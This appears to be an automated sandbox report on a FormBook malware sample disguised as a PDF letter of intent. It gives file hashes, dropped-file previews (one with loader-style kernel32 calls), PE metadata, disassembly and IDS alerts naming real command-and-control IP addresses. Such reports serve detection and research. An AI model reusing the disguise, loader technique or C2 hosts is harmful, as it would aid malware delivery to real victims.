• Filename: PriceListE2024.exe, Detection: malicious
• Filename: PriceListE2024.exe, Detection: malicious
• Filename: Produccion.exe, Detection: malicious
• Filename: card_residente_85ds6gf202405.exe, Detection: malicious
                                                                                    Reputation:moderate, very likely benign file
                                                                                    Process:C:\Users\user\Desktop\Letter of Intent (LOI) For the Company November 2024 PDF.pif.exe
                                                                                    File Type:ASCII text, with CRLF line terminators
                                                                                    Category:dropped
                                                                                    Size (bytes):27
                                                                                    Entropy (8bit):4.134336113194451
                                                                                    Encrypted:false
                                                                                    SSDEEP:3:iGAeSMn:lAeZ
                                                                                    MD5:7AB6006A78C23C5DEC74C202B85A51A4
                                                                                    SHA1:C0FF9305378BE5EC16A18127C171BB9F04D5C640
                                                                                    SHA-256:BDDCBC9F6E35E10FA203E176D28CDB86BA3ADD97F2CFFD2BDA7A335B1037B71D
                                                                                    SHA-512:40464F667E1CDF9D627642BE51B762245FA62097F09D3739BF94728BC9337E8A296CE4AC18380B1AED405ADB72435A2CD915E3BC37F6840F34781028F3D8AED6
                                                                                    Malicious:false
                                                                                    Preview:[Access]..Setting=Enabled..
                                                                                    Process:C:\Users\user\Desktop\Letter of Intent (LOI) For the Company November 2024 PDF.pif.exe
                                                                                    File Type:data
                                                                                    Category:dropped
                                                                                    Size (bytes):499509
                                                                                    Entropy (8bit):1.2479638079935327
                                                                                    Encrypted:false
                                                                                    SSDEEP:1536:2e2ADTXn7YNFoMnOU7B0MyikqXVkmkE4sOM:2eTTLYzoM9VsmFacOM
                                                                                    MD5:E10D8BA814468FEA91340228B53A154E
                                                                                    SHA1:C2A368671FFB6B5A01E41F67BC05FABEDED4ED1A
                                                                                    SHA-256:9E1C925997A281A90571D928B7C9E20FD67C2394093C94D5825E0A3C6CB6F3F6
                                                                                    SHA-512:3A410C9464C6BD79ADDB8CB677DBC43C2FD62D6B3004032DCAA147CF2A477DA909032287F733C8D1FFC54D0A49A35846BF5E04E04ADAD3543EBD4DA1B35B1609
                                                                                    Malicious:false
                                                                                    Process:C:\Users\user\Desktop\Letter of Intent (LOI) For the Company November 2024 PDF.pif.exe
                                                                                    File Type:data
                                                                                    Category:dropped
                                                                                    Size (bytes):6400
                                                                                    Entropy (8bit):4.376335142822035
                                                                                    Encrypted:false
                                                                                    SSDEEP:96:73L1Ok+IGQ5tyqg3vdkHVniM+WRup864qD7EQgfyJY3bYzn5utyA1q:77Y+z5wqyKgvDu64qPaINcq
                                                                                    MD5:916C029867D06F8B811E0C2F7323999F
                                                                                    SHA1:910D1F60A75BF0FB2D52EE49852485FE27B21220
                                                                                    SHA-256:1832FAA9B36AD80B5E6614A11F8945D241A44BB11326DFE9CD3C779722D22289
                                                                                    SHA-512:F79B98C4C7B0DA8E2D04FB8A6743370CE3EE6277AA7008ADF02B7B055A5DD9CACEB57E370D9893DB0C63289282BFAD1955A2975AAB80C254DB23AC6EF7B025FA
                                                                                    Malicious:false
                                                                                    Preview:..........333....-...........i..u............ffffff......X....6666.............................k...e...r...n...e...l.tt3..u2...:...:...C...r...e...a...t.Q.e...F...i...l...e...A...(...m... ...r...4... .N.,... ...i... ...0...x...8...0...0...0...0...0...0.7.0...,... ...i... ...0...,... ...p... ...0...,... ...i..B ...4...,... ...i.LL ...0...x...8...0..",... ...i... ...0.y.).MMi......rr...8...q...k...e...r...n...e...l...3..o2...:.GG:...S...e...t...F...i...l...e...P...o...i...n...t..Me...r...(...i... ...r...8...,... ...i... ...2.<<3...0...1...2... ..\,... ...i... ...0...,...i..W .H.0...)...i.......r...4...q...k...e...r...n...e.7.l..w3...2...:...:...V...i...r...t...u...a...l...A...l...l...o...c..o(...i.., ...0...,...i..i ...2...2...6...9..V5...9...3...6...,... ...i... ...0...x..73...0...0...0...,... ...i... ...0...x.x.4...0...)...p.......r...2...q.ook.yye...r...n...e...l...3...2..{:...:...R...e...a...d...F...i..9l...e...(...i... ...r...8..6,..4 ...i.II ...r...2...,... ..0i... ...2..Q2..l6...9
                                                                                    Process:C:\Users\user\Desktop\Letter of Intent (LOI) For the Company November 2024 PDF.pif.exe
                                                                                    File Type:data
                                                                                    Category:dropped
                                                                                    Size (bytes):276806
                                                                                    Entropy (8bit):7.516532348830352
                                                                                    Encrypted:false
                                                                                    SSDEEP:6144:WP8lLj2tJcBu6LysllRFtIkau0Sf3t609D:WUpjRBuQ2kau1fd6Y
                                                                                    MD5:AB16D1A3B5B1A209735D521B214A9900
                                                                                    SHA1:339E11522947458A52F97FD776EB6DD661F998AB
                                                                                    SHA-256:88C256014B094E2F62C09570D35308526BB9EFB4873D85DC8AE8B51AF681B6D6
                                                                                    SHA-512:32A940D48BC8382677A9CB7BA03BF67A98EABEEC56A43F622DA23EFD4066DC8400DAA0506531DAAD236A0FEAF9350CF0341E211701A94A9F64A87F5740A3AC72
                                                                                    Malicious:false
                                                                                    Process:C:\Users\user\Desktop\Letter of Intent (LOI) For the Company November 2024 PDF.pif.exe
                                                                                    File Type:data
                                                                                    Category:dropped
                                                                                    Size (bytes):331684
                                                                                    Entropy (8bit):1.2574385597926245
                                                                                    Encrypted:false
                                                                                    SSDEEP:1536:xblGMxZHaoty4DCyveets9uVE+hlt9QUy01W7Mf:BMlorDCy2etvHQK1R
                                                                                    MD5:05CCC9BDA38B2476C906FCEE3E8EA874
                                                                                    SHA1:1F15809DAA794E75A5656F99F46318401BBE2A1F
                                                                                    SHA-256:C36D383530F12BACDF0FFE1D51FE68B0CD434A44B269F0AEA0387A0070FF5EAE
                                                                                    SHA-512:43296487A30DAC5197862F49B42543D64DF02B65C663D4B7F9EBD1DD91BA5205073C981B9424ABF51438022FF5924218E62238DCC29730533562A2CB7138AB8E
                                                                                    Malicious:false
                                                                                    Process:C:\Users\user\Desktop\Letter of Intent (LOI) For the Company November 2024 PDF.pif.exe
                                                                                    File Type:data
                                                                                    Category:dropped
                                                                                    Size (bytes):301131
                                                                                    Entropy (8bit):1.255297599628044
                                                                                    Encrypted:false
                                                                                    SSDEEP:768:kwCsez5LtC8Z3XOb+wB74xr9Zmz6R2lfOEMjq87821laQZkzxioroCdsIDW7qJ8h:k/j9QhoJs8CkVxNxxoRaNHI2KK
                                                                                    MD5:516B1DF664E8BF7AB8CAACBF4DC516DA
                                                                                    SHA1:49EECB5BD8788E0C59AFFDE73741CFAC314FDC93
                                                                                    SHA-256:BA8EE4ABE77BD1E22ED695EAF26A38CC75991E88F205DB5ECB82561657C5BF17
                                                                                    SHA-512:6B2D97DD182233E33DC12C57779C25E4C9E785BB16E903ECD3E114128260DB4245B1F92E1F41C16667BB3ACD9229F81A2155141D6079CB41AC03562C478D7362
                                                                                    Malicious:false
                                                                                    Process:C:\Users\user\Desktop\Letter of Intent (LOI) For the Company November 2024 PDF.pif.exe
                                                                                    File Type:data
                                                                                    Category:dropped
                                                                                    Size (bytes):355077
                                                                                    Entropy (8bit):1.2559441428269094
                                                                                    Encrypted:false
                                                                                    SSDEEP:768:O8NKTwsabfHGEiOnKsSugRvnwIc8m/Cwu1264ZhD/UnZvIUtJPE7dmSKrTCLONXv:Ts7OnxBC5hCcz+g/hDnLebmpzE
                                                                                    MD5:77BB7E13B5BFEAF3F93ACBEC6452CAB6
                                                                                    SHA1:2F64CF4189221B8C597A430AF32AE22BEACFEE55
                                                                                    SHA-256:B10E831B356D18C7666F99A0CA35FF881DE2FB0AD1018D96E4B11EAA5A8DE074
                                                                                    SHA-512:5D79E8E51CC88D45634E7F3289DF00B62008561E7B1271B9FC5EBA76663A9DF9E93176B959D8C4BBE7B65272500F705B8097A93EC48B44BD6EFBE26F1A23196C
                                                                                    Malicious:false
                                                                                    Process:C:\Users\user\Desktop\Letter of Intent (LOI) For the Company November 2024 PDF.pif.exe
                                                                                    File Type:data
                                                                                    Category:dropped
                                                                                    Size (bytes):228011
                                                                                    Entropy (8bit):1.2532037500229543
                                                                                    Encrypted:false
                                                                                    SSDEEP:768:y84Q/u64rOry42JVzYWe2cBVS8Z9CdGhovLplTvheStLNVe0AQDyNfZZ4y1l1sRS:poKw/k9CR3w48aQdggr
                                                                                    MD5:C9E637823D691E03E1EF73F8E64ADD08
                                                                                    SHA1:023BC1C491EC1B246F7E8FEBE5A61A2070527748
                                                                                    SHA-256:AF958CDA45A90F95517D266FF0D3BC47A776D7F8E9B8F47F135C156B22269D6D
                                                                                    SHA-512:BA0B0DD92F0C92F1EBDA941B0CFEA1EFD23330CF22722528F105E389B0A6A4BC1E67B896016E04A06103DE1043DE951D0D5614246049E52F4E383DF9FE460FB3
                                                                                    Malicious:false
                                                                                    Process:C:\Users\user\Desktop\Letter of Intent (LOI) For the Company November 2024 PDF.pif.exe
                                                                                    File Type:ASCII text, with CRLF line terminators
                                                                                    Category:dropped
                                                                                    Size (bytes):524
                                                                                    Entropy (8bit):4.273168465400228
                                                                                    Encrypted:false
                                                                                    SSDEEP:12:0Lxm1D0cB6JcmOkOaDJ1yAMFAzvpRvyOpQyZWiRna:silm2YTy9uWy4iRa
                                                                                    MD5:ED75DDC6B937EC6859D3514B65746038
                                                                                    SHA1:87D81D925A7D60C966957B422CA3437DF5336D23
                                                                                    SHA-256:66B24667C0EAB0C7341C088A7403D538E7A5FD81497C2CC879E1A3B6CA422CAD
                                                                                    SHA-512:8CA8F12DDF374E0328788C32773E55ADD74097DD23758A196C6B77778042F098F06FC41C196C9D3F0782359FBF768D4BB87B96486848ECBD28E3CA4620C2D810
                                                                                    Malicious:false
                                                                                    Preview:charmers ttnings paxiuba ansporing fiksstjernen trica prominences.grafikrutinernes zygmund klaphamres amene laicizations sangbunde akrabattine metachromasis kiteflier choleate modtageliges promenere..autoriseringerne physiotherapeutical vrdistemplingens.enmity opkradsning shooler semiclosure scrivenery acephalite.chrysopa cathartidae bropengene slaaskamps skvatfigurerne..unretired obambulate tilsvinede ulselighedens medynken grdeskringer reportagens hazardously overpresumptive ecphonema slaabrokkernes temperamenterne..
                                                                                    Process:C:\Users\user\Desktop\Letter of Intent (LOI) For the Company November 2024 PDF.pif.exe
                                                                                    File Type:data
                                                                                    Category:dropped
                                                                                    Size (bytes):325029
                                                                                    Entropy (8bit):1.2487650379056912
                                                                                    Encrypted:false
                                                                                    SSDEEP:768:L5X2ja28J6QCVkiTiKt76+pzV5KmA0FfXrUzCSc3sYn8MkT5AzTSiROIHidBmry4:L5Xj6b7jL8/ndONNQSK7H
                                                                                    MD5:364853569F11BF9AB8030CD2DAA4B6A5
                                                                                    SHA1:CF9FF525E6C1EFA00AFC0BA54A9819E69BD081A8
                                                                                    SHA-256:C2926350CF2C936CB4A932FD7BEE4524B5EE517CCF9634ED6F4E729374612FA6
                                                                                    SHA-512:D3B5911D1A96D0F6365C29F299ADEFFCEE6ED3A9FA28833EC94976D1A625F108CF68B02F7FF87CCE9D19DB71A06CE951B51D1BA67118D062226F4A5A7C1115FE
                                                                                    Malicious:false
                                                                                    Process:C:\Users\user\Desktop\Letter of Intent (LOI) For the Company November 2024 PDF.pif.exe
                                                                                    File Type:MS Windows shortcut, Item id list present, Has Relative path, Has Working directory, ctime=Sun Dec 31 23:25:52 1600, mtime=Sun Dec 31 23:25:52 1600, atime=Sun Dec 31 23:25:52 1600, length=0, window=hide
                                                                                    Category:dropped
                                                                                    Size (bytes):1054
                                                                                    Entropy (8bit):3.2566849542921017
                                                                                    Encrypted:false
                                                                                    SSDEEP:12:8wl0hsXowAOcQ/tz+7REAZcU9+Q1QlKHRKMJsW+slqeWQaUOogv+g/3NJkKAd4tK:8yLDaREGfaEry9eIUOoP49HAvqy
                                                                                    MD5:0FA2FAF25B495C76B5DEAECDB94C87A5
                                                                                    SHA1:040967BB53C3361A1D7269C071ECC92D391F4B59
                                                                                    SHA-256:12B471BE019DE569A910D6F2BC61EFBA5840EA16D27F1945F990D8C4EEAD8B4B
                                                                                    SHA-512:579A929893EE89CDF856A279CDEABD6C6B08788B5E299A626EE8DEFB6E62538D58FB8B1C5EF54EDDE9E17B9B75D0C5F5C51162D8396B27458FCB413857C59EB6
                                                                                    Malicious:false
                                                                                    Preview:L..................F.............................................................P.O. .:i.....+00.../C:\...................P.1...........Users.<............................................U.s.e.r.s.....P.1...........user.<............................................j.o.n.e.s.....V.1...........AppData.@............................................A.p.p.D.a.t.a.....P.1...........Local.<............................................L.o.c.a.l.....f.2...........udvejens.Sta..J............................................u.d.v.e.j.e.n.s...S.t.a...........\.A.p.p.D.a.t.a.\.L.o.c.a.l.\.u.d.v.e.j.e.n.s...S.t.a.x.C.:.\.U.s.e.r.s.\.j.o.n.e.s.\.A.p.p.D.a.t.a.\.R.o.a.m.i.n.g.\.M.i.c.r.o.s.o.f.t.\.W.i.n.d.o.w.s.\.T.e.m.p.l.a.t.e.s.\.s.i.p.h.o.n.o.p.h.o.r.a.n.\.A.r.v.e.a.f.g.i.f.t.e.r.n.e.s.\.w.r.i.g.h.t.\.U.n.s.e.c.l.u.d.e.d.l.y.\.U.n.p.u.l.v.e.r.i.s.e.........(.................l^".`G...3..qs................1SPS.XF.L8C....&.m.q............/...S.-.1.-.5.-.2.1.-.2.2.4.6.1.2.2.6.5.8.-.3.6.9.3.4.0.5.
                                                                                    File type:PE32 executable (GUI) Intel 80386, for MS Windows, Nullsoft Installer self-extracting archive
                                                                                    Entropy (8bit):7.607108347285623
                                                                                    TrID:
                                                                                    • Win32 Executable (generic) a (10002005/4) 99.96%
                                                                                    • Generic Win/DOS Executable (2004/3) 0.02%
                                                                                    • DOS Executable Generic (2002/1) 0.02%
                                                                                    • Autodesk FLIC Image File (extensions: flc, fli, cel) (7/3) 0.00%
                                                                                    File name:Letter of Intent (LOI) For the Company November 2024 PDF.pif.exe
                                                                                    File size:872'244 bytes
                                                                                    MD5:629be165860d2336755de85467756639
                                                                                    SHA1:af1da57d01a00bf942e127cce60fb4208bfd9795
                                                                                    SHA256:e9617a78c93e6d5cdc1087dfa6e9bf9d63406e05b6b01135c189242a7c33718c
                                                                                    SHA512:418f56a804212158033b1ae592cafeb8fa1c5a0d9506eb541beb7762c23ebfe5c61dbac8588c350816c229e9f6d77457e361423146874695976c1b8d9267cbff
                                                                                    SSDEEP:24576:ZNAsPMh+Cdd8509puHmATonQ1htKzWbGWO:dPMvA509pkonAhtHbnO
                                                                                    TLSH:1105120A7B16E947C9704D3CA8B5CA542BB47C0C9961E33277C07F6E3DB3642AA83795
                                                                                    File Content Preview:MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$.......1.D9u.*ju.*ju.*j..ujw.*ju.+j..*j..wjd.*j!..j..*j..,jt.*jRichu.*j........PE..L....e.Q.................b...........1............@
                                                                                    Icon Hash:87933b33334c7017
                                                                                    Entrypoint:0x4031dd
                                                                                    Entrypoint Section:.text
                                                                                    Digitally signed:false
                                                                                    Imagebase:0x400000
                                                                                    Subsystem:windows gui
                                                                                    Image File Characteristics:RELOCS_STRIPPED, EXECUTABLE_IMAGE, LINE_NUMS_STRIPPED, LOCAL_SYMS_STRIPPED, 32BIT_MACHINE
                                                                                    DLL Characteristics:TERMINAL_SERVER_AWARE
                                                                                    Time Stamp:0x519965E1 [Sun May 19 23:53:05 2013 UTC]
                                                                                    TLS Callbacks:
                                                                                    CLR (.Net) Version:
                                                                                    OS Version Major:4
                                                                                    OS Version Minor:0
                                                                                    File Version Major:4
                                                                                    File Version Minor:0
                                                                                    Subsystem Version Major:4
                                                                                    Subsystem Version Minor:0
                                                                                    Import Hash:7fd61eafe142870d6d0380163804a642
                                                                                    Instruction
                                                                                    sub esp, 000002D4h
                                                                                    push ebx
                                                                                    push ebp
                                                                                    push esi
                                                                                    push edi
                                                                                    push 00000020h
                                                                                    xor ebp, ebp
                                                                                    pop esi
                                                                                    mov dword ptr [esp+18h], ebp
                                                                                    mov dword ptr [esp+10h], 0040A2D8h
                                                                                    mov dword ptr [esp+14h], ebp
                                                                                    call dword ptr [00408034h]
                                                                                    push 00008001h
                                                                                    call dword ptr [00408134h]
                                                                                    push ebp
                                                                                    call dword ptr [004082ACh]
                                                                                    push 00000008h
                                                                                    mov dword ptr [00434F58h], eax
                                                                                    call 00007F257D7EFA65h
                                                                                    mov dword ptr [00434EA4h], eax
                                                                                    push ebp
                                                                                    lea eax, dword ptr [esp+34h]
                                                                                    push 000002B4h
                                                                                    push eax
                                                                                    push ebp
                                                                                    push 0042B1B8h
                                                                                    call dword ptr [0040817Ch]
                                                                                    push 0040A2C0h
                                                                                    push 00433EA0h
                                                                                    call 00007F257D7EF6D0h
                                                                                    call dword ptr [00408138h]
                                                                                    mov ebx, 0043F000h
                                                                                    push eax
                                                                                    push ebx
                                                                                    call 00007F257D7EF6BEh
                                                                                    push ebp
                                                                                    call dword ptr [0040810Ch]
                                                                                    cmp word ptr [0043F000h], 0022h
                                                                                    mov dword ptr [00434EA0h], eax
                                                                                    mov eax, ebx
                                                                                    jne 00007F257D7ECBDAh
                                                                                    push 00000022h
                                                                                    mov eax, 0043F002h
                                                                                    pop esi
                                                                                    push esi
                                                                                    push eax
                                                                                    call 00007F257D7EF12Ch
                                                                                    push eax
                                                                                    call dword ptr [00408240h]
                                                                                    mov dword ptr [esp+1Ch], eax
                                                                                    jmp 00007F257D7ECC99h
                                                                                    push 00000020h
                                                                                    pop edx
                                                                                    cmp cx, dx
                                                                                    jne 00007F257D7ECBD9h
                                                                                    inc eax
                                                                                    inc eax
                                                                                    cmp word ptr [eax], dx
                                                                                    je 00007F257D7ECBCBh
                                                                                    add word ptr [eax], 0000h
                                                                                    Programming Language:
                                                                                    • [EXP] VC++ 6.0 SP5 build 8804
| Name | Virtual Address | Virtual Size | Is in Section |
|---|---|---|---|
| IMAGE_DIRECTORY_ENTRY_EXPORT | 0x0 | 0x0 | |
| IMAGE_DIRECTORY_ENTRY_IMPORT | 0x85a0 | 0xb4 | .rdata |
| IMAGE_DIRECTORY_ENTRY_RESOURCE | 0x5d000 | 0x28300 | .rsrc |
| IMAGE_DIRECTORY_ENTRY_EXCEPTION | 0x0 | 0x0 | |
| IMAGE_DIRECTORY_ENTRY_SECURITY | 0x0 | 0x0 | |
| IMAGE_DIRECTORY_ENTRY_BASERELOC | 0x0 | 0x0 | |
| IMAGE_DIRECTORY_ENTRY_DEBUG | 0x0 | 0x0 | |
| IMAGE_DIRECTORY_ENTRY_COPYRIGHT | 0x0 | 0x0 | |
| IMAGE_DIRECTORY_ENTRY_GLOBALPTR | 0x0 | 0x0 | |
| IMAGE_DIRECTORY_ENTRY_TLS | 0x0 | 0x0 | |
| IMAGE_DIRECTORY_ENTRY_LOAD_CONFIG | 0x0 | 0x0 | |
| IMAGE_DIRECTORY_ENTRY_BOUND_IMPORT | 0x0 | 0x0 | |
| IMAGE_DIRECTORY_ENTRY_IAT | 0x8000 | 0x2b8 | .rdata |
| IMAGE_DIRECTORY_ENTRY_DELAY_IMPORT | 0x0 | 0x0 | |
| IMAGE_DIRECTORY_ENTRY_COM_DESCRIPTOR | 0x0 | 0x0 | |
| IMAGE_DIRECTORY_ENTRY_RESERVED | 0x0 | 0x0 | |
| Name | Virtual Address | Virtual Size | Raw Size | MD5 | Xored PE | ZLIB Complexity | File Type | Entropy | Characteristics |
|---|---|---|---|---|---|---|---|---|---|
| .text | 0x1000 | 0x6010 | 0x6200 | c51ae685760de510818d22f29d66b8b0 | False | 0.6646603954081632 | data | 6.440168137798694 | IMAGE_SCN_CNT_CODE, IMAGE_SCN_MEM_EXECUTE, IMAGE_SCN_MEM_READ |
| .rdata | 0x8000 | 0x1460 | 0x1600 | 24345ed7377f4b4663284282b5ef48b3 | False | 0.42134232954545453 | data | 4.947177345443015 | IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_READ |
| .data | 0xa000 | 0x2af98 | 0x600 | dc268be7d1af6fdfcd38d44492cfdaf5 | False | 0.486328125 | data | 3.791234740340295 | IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_READ, IMAGE_SCN_MEM_WRITE |
| .ndata | 0x35000 | 0x28000 | 0x0 | d41d8cd98f00b204e9800998ecf8427e | False | 0 | empty | 0.0 | IMAGE_SCN_CNT_UNINITIALIZED_DATA, IMAGE_SCN_MEM_READ, IMAGE_SCN_MEM_WRITE |
| .rsrc | 0x5d000 | 0x28300 | 0x28400 | a119b7e5d4138a60065aad86fa7fabff | False | 0.3532062791149068 | data | 4.59595260611914 | IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_READ |
| Name | RVA | Size | Type | Language | Country | ZLIB Complexity |
|---|---|---|---|---|---|---|
| RT_ICON | 0x5d358 | 0x10828 | Device independent bitmap graphic, 128 x 256 x 32, image size 67584 | English | United States | 0.3054241097835088 |
| RT_ICON | 0x6db80 | 0x94a8 | Device independent bitmap graphic, 96 x 192 x 32, image size 38016 | English | United States | 0.3743167963001892 |
| RT_ICON | 0x77028 | 0x5488 | Device independent bitmap graphic, 72 x 144 x 32, image size 21600 | English | United States | 0.38766173752310534 |
| RT_ICON | 0x7c4b0 | 0x4228 | Device independent bitmap graphic, 64 x 128 x 32, image size 16896 | English | United States | 0.3723429381199811 |
| RT_ICON | 0x806d8 | 0x25a8 | Device independent bitmap graphic, 48 x 96 x 32, image size 9600 | English | United States | 0.42686721991701243 |
| RT_ICON | 0x82c80 | 0x10a8 | Device independent bitmap graphic, 32 x 64 x 32, image size 4224 | English | United States | 0.43550656660412757 |
| RT_ICON | 0x83d28 | 0x988 | Device independent bitmap graphic, 24 x 48 x 32, image size 2400 | English | United States | 0.5016393442622951 |
| RT_ICON | 0x846b0 | 0x468 | Device independent bitmap graphic, 16 x 32 x 32, image size 1088 | English | United States | 0.5647163120567376 |
| RT_DIALOG | 0x84b18 | 0x120 | data | English | United States | 0.5104166666666666 |
| RT_DIALOG | 0x84c38 | 0x11c | data | English | United States | 0.6056338028169014 |
| RT_DIALOG | 0x84d58 | 0xc4 | data | English | United States | 0.5918367346938775 |
| RT_DIALOG | 0x84e20 | 0x60 | data | English | United States | 0.7291666666666666 |
| RT_GROUP_ICON | 0x84e80 | 0x76 | data | English | United States | 0.7457627118644068 |
| RT_VERSION | 0x84ef8 | 0x138 | data | English | United States | 0.5865384615384616 |
| RT_MANIFEST | 0x85030 | 0x2cb | XML 1.0 document, ASCII text, with very long lines (715), with no line terminators | English | United States | 0.5664335664335665 |
| DLL | Import |
|---|---|
| KERNEL32.dll | CompareFileTime, SearchPathW, SetFileTime, CloseHandle, GetShortPathNameW, MoveFileW, SetCurrentDirectoryW, GetFileAttributesW, GetLastError, GetFullPathNameW, CreateDirectoryW, Sleep, GetTickCount, GetFileSize, GetModuleFileNameW, GetCurrentProcess, CopyFileW, ExitProcess, SetEnvironmentVariableW, GetWindowsDirectoryW, GetTempPathW, SetFileAttributesW, ExpandEnvironmentStringsW, LoadLibraryW, lstrlenW, lstrcpynW, GetDiskFreeSpaceW, GlobalUnlock, GlobalLock, CreateThread, CreateProcessW, RemoveDirectoryW, lstrcmpiA, CreateFileW, GetTempFileNameW, lstrcpyA, lstrcpyW, lstrcatW, GetSystemDirectoryW, GetVersion, GetProcAddress, LoadLibraryA, GetModuleHandleA, GetModuleHandleW, lstrcmpiW, lstrcmpW, WaitForSingleObject, GlobalFree, GlobalAlloc, LoadLibraryExW, GetExitCodeProcess, FreeLibrary, WritePrivateProfileStringW, SetErrorMode, GetCommandLineW, GetPrivateProfileStringW, FindFirstFileW, FindNextFileW, DeleteFileW, SetFilePointer, MultiByteToWideChar, FindClose, MulDiv, ReadFile, WriteFile, lstrlenA, WideCharToMultiByte |
| USER32.dll | EndDialog, ScreenToClient, GetWindowRect, RegisterClassW, EnableMenuItem, GetSystemMenu, SetClassLongW, IsWindowEnabled, SetWindowPos, GetSysColor, GetWindowLongW, SetCursor, LoadCursorW, CheckDlgButton, GetMessagePos, LoadBitmapW, CallWindowProcW, IsWindowVisible, CloseClipboard, SetClipboardData, wsprintfW, CreateWindowExW, SystemParametersInfoW, AppendMenuW, CreatePopupMenu, GetSystemMetrics, SetDlgItemTextW, GetDlgItemTextW, MessageBoxIndirectW, CharPrevW, CharNextA, wsprintfA, DispatchMessageW, PeekMessageW, ReleaseDC, EnableWindow, InvalidateRect, SendMessageW, DefWindowProcW, BeginPaint, GetClientRect, FillRect, DrawTextW, GetClassInfoW, DialogBoxParamW, CharNextW, ExitWindowsEx, DestroyWindow, CreateDialogParamW, SetTimer, SetWindowTextW, PostQuitMessage, GetDC, SetWindowLongW, LoadImageW, SendMessageTimeoutW, FindWindowExW, EmptyClipboard, OpenClipboard, TrackPopupMenu, EndPaint, ShowWindow, GetDlgItem, IsWindow, SetForegroundWindow |
| GDI32.dll | SelectObject, SetBkMode, CreateFontIndirectW, SetTextColor, DeleteObject, GetDeviceCaps, CreateBrushIndirect, SetBkColor |
| SHELL32.dll | SHGetSpecialFolderLocation, SHGetPathFromIDListW, SHBrowseForFolderW, SHGetFileInfoW, ShellExecuteW, SHFileOperationW |
| ADVAPI32.dll | RegCloseKey, RegOpenKeyExW, RegDeleteKeyW, RegDeleteValueW, RegEnumValueW, RegCreateKeyExW, RegSetValueExW, RegQueryValueExW, RegEnumKeyW |
| COMCTL32.dll | ImageList_Create, ImageList_AddMasked, ImageList_Destroy |
| ole32.dll | CoCreateInstance, CoTaskMemFree, OleInitialize, OleUninitialize |
| VERSION.dll | GetFileVersionInfoSizeW, GetFileVersionInfoW, VerQueryValueW |
| Language of compilation system | Country where language is spoken | Map |
|---|---|---|
| English | United States | |
| Timestamp | SID | Signature | Severity | Source IP | Source Port | Dest IP | Dest Port | Protocol |
|---|---|---|---|---|---|---|---|---|
| 2024-11-06T20:32:32.980672+0100 | 2022930 | ET EXPLOIT Possible CVE-2016-2211 Symantec Cab Parsing Buffer Overflow | 1 | 4.245.163.56 | 443 | 192.168.2.4 | 49730 | TCP |
| 2024-11-06T20:32:37.413179+0100 | 2803270 | ETPRO MALWARE Common Downloader Header Pattern UHCa | 2 | 192.168.2.4 | 49735 | 69.27.100.185 | 443 | TCP |
| 2024-11-06T20:33:13.156494+0100 | 2022930 | ET EXPLOIT Possible CVE-2016-2211 Symantec Cab Parsing Buffer Overflow | 1 | 4.245.163.56 | 443 | 192.168.2.4 | 49792 | TCP |
| 2024-11-06T20:33:21.629609+0100 | 2050745 | ET MALWARE FormBook CnC Checkin (GET) M5 | 1 | 192.168.2.4 | 49844 | 3.33.130.190 | 80 | TCP |
| 2024-11-06T20:33:21.629609+0100 | 2855465 | ETPRO MALWARE FormBook CnC Checkin (GET) M2 | 1 | 192.168.2.4 | 49844 | 3.33.130.190 | 80 | TCP |
| 2024-11-06T20:33:37.730040+0100 | 2855464 | ETPRO MALWARE FormBook CnC Checkin (POST) M3 | 1 | 192.168.2.4 | 49922 | 180.178.39.235 | 80 | TCP |
| 2024-11-06T20:33:40.308120+0100 | 2855464 | ETPRO MALWARE FormBook CnC Checkin (POST) M3 | 1 | 192.168.2.4 | 49938 | 180.178.39.235 | 80 | TCP |
| 2024-11-06T20:33:43.026832+0100 | 2855464 | ETPRO MALWARE FormBook CnC Checkin (POST) M3 | 1 | 192.168.2.4 | 49950 | 180.178.39.235 | 80 | TCP |
| 2024-11-06T20:33:45.370544+0100 | 2050745 | ET MALWARE FormBook CnC Checkin (GET) M5 | 1 | 192.168.2.4 | 49965 | 180.178.39.235 | 80 | TCP |
| 2024-11-06T20:33:45.370544+0100 | 2855465 | ETPRO MALWARE FormBook CnC Checkin (GET) M2 | 1 | 192.168.2.4 | 49965 | 180.178.39.235 | 80 | TCP |
| 2024-11-06T20:33:51.292199+0100 | 2855464 | ETPRO MALWARE FormBook CnC Checkin (POST) M3 | 1 | 192.168.2.4 | 50001 | 203.161.49.193 | 80 | TCP |
| 2024-11-06T20:33:53.834312+0100 | 2855464 | ETPRO MALWARE FormBook CnC Checkin (POST) M3 | 1 | 192.168.2.4 | 50009 | 203.161.49.193 | 80 | TCP |
| 2024-11-06T20:33:56.388553+0100 | 2855464 | ETPRO MALWARE FormBook CnC Checkin (POST) M3 | 1 | 192.168.2.4 | 50010 | 203.161.49.193 | 80 | TCP |
| 2024-11-06T20:33:58.924339+0100 | 2050745 | ET MALWARE FormBook CnC Checkin (GET) M5 | 1 | 192.168.2.4 | 50011 | 203.161.49.193 | 80 | TCP |
| 2024-11-06T20:33:58.924339+0100 | 2855465 | ETPRO MALWARE FormBook CnC Checkin (GET) M2 | 1 | 192.168.2.4 | 50011 | 203.161.49.193 | 80 | TCP |
| 2024-11-06T20:34:04.854646+0100 | 2855464 | ETPRO MALWARE FormBook CnC Checkin (POST) M3 | 1 | 192.168.2.4 | 50012 | 217.160.0.132 | 80 | TCP |
| 2024-11-06T20:34:07.463930+0100 | 2855464 | ETPRO MALWARE FormBook CnC Checkin (POST) M3 | 1 | 192.168.2.4 | 50013 | 217.160.0.132 | 80 | TCP |
| 2024-11-06T20:34:10.057706+0100 | 2855464 | ETPRO MALWARE FormBook CnC Checkin (POST) M3 | 1 | 192.168.2.4 | 50014 | 217.160.0.132 | 80 | TCP |
| 2024-11-06T20:34:12.569554+0100 | 2050745 | ET MALWARE FormBook CnC Checkin (GET) M5 | 1 | 192.168.2.4 | 50015 | 217.160.0.132 | 80 | TCP |
| 2024-11-06T20:34:12.569554+0100 | 2855465 | ETPRO MALWARE FormBook CnC Checkin (GET) M2 | 1 | 192.168.2.4 | 50015 | 217.160.0.132 | 80 | TCP |
| 2024-11-06T20:34:19.192230+0100 | 2855464 | ETPRO MALWARE FormBook CnC Checkin (POST) M3 | 1 | 192.168.2.4 | 50016 | 216.40.34.41 | 80 | TCP |
| 2024-11-06T20:34:21.979086+0100 | 2855464 | ETPRO MALWARE FormBook CnC Checkin (POST) M3 | 1 | 192.168.2.4 | 50017 | 216.40.34.41 | 80 | TCP |
